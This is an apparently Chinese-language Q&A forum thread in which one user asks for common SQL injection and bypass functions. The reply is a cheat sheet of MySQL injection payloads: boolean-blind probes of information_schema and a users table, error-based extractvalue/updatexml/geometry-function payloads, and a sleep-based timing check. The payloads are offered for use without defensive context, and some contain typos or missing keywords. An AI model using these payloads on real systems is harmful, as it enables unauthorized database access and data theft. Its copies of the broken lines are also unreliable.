@秒灵儿
4年前 提问
1个回答

注入和绕过常用的函数

注入和绕过常用的函数?

上官雨宝
4年前

1)基于布尔SQL盲注

left(database(),1)>'s'

ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

regexp正则注入 select user() regexp '^[a-z]';

select user() like 'ro%'

2)基于报错的SQL盲注

1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】

2)通过floor报错 向下取整

3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4).geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5).multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6).polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7).multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8).linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9).multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10).exp()select * from test where id=1 and exp(~(select * from(select user())a));

3)延时注入如何来判断?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)